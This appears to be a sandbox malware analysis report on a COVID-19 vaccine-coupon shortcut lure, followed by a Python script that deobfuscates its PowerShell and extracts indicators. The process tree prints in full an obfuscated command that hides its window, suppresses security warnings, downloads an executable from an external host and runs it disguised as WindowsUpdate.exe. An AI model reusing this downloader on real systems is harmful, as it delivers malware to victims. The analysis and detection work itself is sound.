Analysis
- max time kernel: 133s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 28-02-2022 03:10
Behavioral tasks
- behavioral1: Sample COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk, Resource win7-20220223-en
- behavioral2: Sample COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk, Resource win10v2004-en-20220113
- behavioral3: Sample EUA 27034_FS for Vaccination Providers-Full EUA PI_Final_4.6.2021.pdf, Resource win7-en-20211208
- behavioral4: Sample EUA 27034_FS for Vaccination Providers-Full EUA PI_Final_4.6.2021.pdf, Resource win10v2004-en-20220113
- behavioral5: Sample SUMMARY OF PRODUCT CHARACTERISTICS/comirnaty-epar-product-information_en.pdf, Resource win7-en-20211208
- behavioral6: Sample SUMMARY OF PRODUCT CHARACTERISTICS/comirnaty-epar-product-information_en.pdf, Resource win10v2004-en-20220113
General
- Target: COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk
- Size: 1KB
- MD5: 5897322f62070e894488b4115463939d
- SHA1: 217490d9df6b3eb30caec933c6f3a04ae3a3a82f
- SHA256: 101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5
- SHA512: 83cdc338ce8c7f5bf030ddd654a17b3a7fc6283d9331e5c0eeadc3e4c98aacfb72d51890e9dcb56f4115cd05fba09a0d45a2c751e599c1c45122b86db65f87d1
Malware Config
- Extracted: http://1000018.xyz/soft-2/280421-z1z.exe
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Process: cmd.exe | Key value queried: \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature is "likely ransomware behaviour"; nothing else in this report supports that reading for this sample, whose command line downloads and runs a payload.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Process: powershell.exe (PID 2960), two hits
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe (PID 2960) | Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (4 IoCs)
  PID 1564 cmd.exe wrote to memory of PID 2772 cmd.exe (two hits)
  PID 2772 cmd.exe wrote to memory of PID 2960 powershell.exe (two hits)
Processes
- C:\Windows\system32\cmd.exe (PID 1564)
  cmd /c C:\Users\Admin\AppData\Local\Temp\COVID-19-Vaccine-Coupon\COVID-19-Vaccine-Coupon.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 2772, child of 1564)
    "C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2960, child of 2772)
      poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
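Deobfuscating the PowerShell one-liner, as an added example that is not part of the sandbox report. The command hides its cmdlet names with backticks (PowerShell's escape character, which is a no-op before any character that is not one of its case-sensitive escape letters such as `n or `t) and splits the download URL into concatenated single-quoted pieces; -w 1 is -WindowStyle Hidden, and SEE_MASK_NOZONECHECKS=1 suppresses the zone-check security warning Windows would show when a downloaded file is launched. The Python script below undoes both tricks and pulls out the indicators a detection rule would key on. SAMPLE_CMD is the command line recorded for PID 2960, copied verbatim; the function names and the list of cmdlets it looks for are the example's own. One caveat for anyone reproducing this: a PowerShell double-quoted string expands only $(...) subexpressions, so the parenthesised concatenation in -Source "('ht'+'tp'+...)" is passed to Start-BitsTransfer as a literal rather than evaluated, and the transfer as written would not succeed; the script still recovers the intended URL.

```python
"""Deobfuscate the PowerShell one-liner from this report and extract its IoCs.

Added example, not part of the sandbox report. Handles the two tricks the
sample uses: backtick insertion inside cmdlet names and string concatenation
of the download URL.
"""
import re

# Command line recorded for PID 2960 in the report (copied verbatim).
SAMPLE_CMD = (
    "poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; "
    "Im`Po`RT`-modULe bItsTR`Ans`Fer; "
    "STArt-b`IT`sT`R`AN`SF`ER -Source \"('ht'+'tp'+'://1000'+'018.x'+'yz'"
    "+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')\" "
    "-Destination $ENV:TEMP\\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; "
    "./`WindowsUpdate.exe"
)

# PowerShell backtick escapes are case-sensitive (`n is a newline, `N is just N),
# which is why an obfuscator can scatter backticks before most letters for free.
_ESCAPES = {"0": "\0", "a": "\a", "b": "\b", "e": "\x1b", "f": "\f",
            "n": "\n", "r": "\r", "t": "\t", "v": "\v"}


def strip_backticks(s: str) -> str:
    """Resolve real escape sequences; a backtick before any other char is dropped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "`" and i + 1 < len(s):
            out.append(_ESCAPES.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


# ('a'+'b'+'c') with two or more single-quoted pieces; a lone ('cd') is left alone.
_CONCAT = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")


def fold_concats(s: str) -> str:
    """Replace each ('x'+'y'+...) group with the single joined literal 'xy...'."""
    return _CONCAT.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", s)


def deobfuscate(cmd: str) -> str:
    return fold_concats(strip_backticks(cmd))


def extract_urls(cmd: str) -> list:
    return re.findall(r"https?://[^\s'\"]+", deobfuscate(cmd))


# Cmdlets worth flagging in a downloader; extend as needed (example's own list).
_CMDLETS = re.compile(
    r"(?i)\b(import-module|start-bitstransfer|invoke-webrequest|invoke-expression|iex)\b")


def summarize(cmd: str) -> dict:
    """IoCs and red flags a detection rule would key on."""
    d = deobfuscate(cmd)
    dest = re.search(r"(?i)-destination\s+(\S+)", d)
    return {
        "deobfuscated": d,
        "url": (extract_urls(cmd) or [None])[0],
        "destination": dest.group(1) if dest else None,
        # SEE_MASK_NOZONECHECKS=1 suppresses the zone-check warning on launch.
        "zone_check_disabled": bool(re.search(r"(?i)SEE_MASK_NOZONECHECKS\s*=\s*1", d)),
        # -w 1 is -WindowStyle Hidden.
        "hidden_window": bool(re.search(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", d)),
        "cmdlets": sorted({m.lower() for m in _CMDLETS.findall(d)}),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_CMD).items():
        print(f"{key}: {value}")
```

Running it prints the cleaned command plus the URL http://1000018.xyz/soft-2/280421-z1z.exe, the drop path $ENV:TEMP\WindowsUpdate.exe, and the two cmdlets, matching the Malware Config entry above. The backtick handling deliberately keeps the case-sensitive escape table rather than blindly deleting every backtick, so a command that legitimately contains `n or `t survives the pass intact.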
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads (memory dumps of powershell.exe, PID 2960)
- memory/2960-130-0x000002A0CC580000-0x000002A0CC5A2000-memory.dmp (136KB)
- memory/2960-131-0x000002A0CC600000-0x000002A0CC614000-memory.dmp (80KB)
- memory/2960-132-0x00007FFF381E3000-0x00007FFF381E5000-memory.dmp (8KB)
- memory/2960-134-0x000002A0AEF63000-0x000002A0AEF65000-memory.dmp (8KB)
- memory/2960-133-0x000002A0AEF60000-0x000002A0AEF62000-memory.dmp (8KB)
- memory/2960-135-0x000002A0AEF66000-0x000002A0AEF68000-memory.dmp (8KB)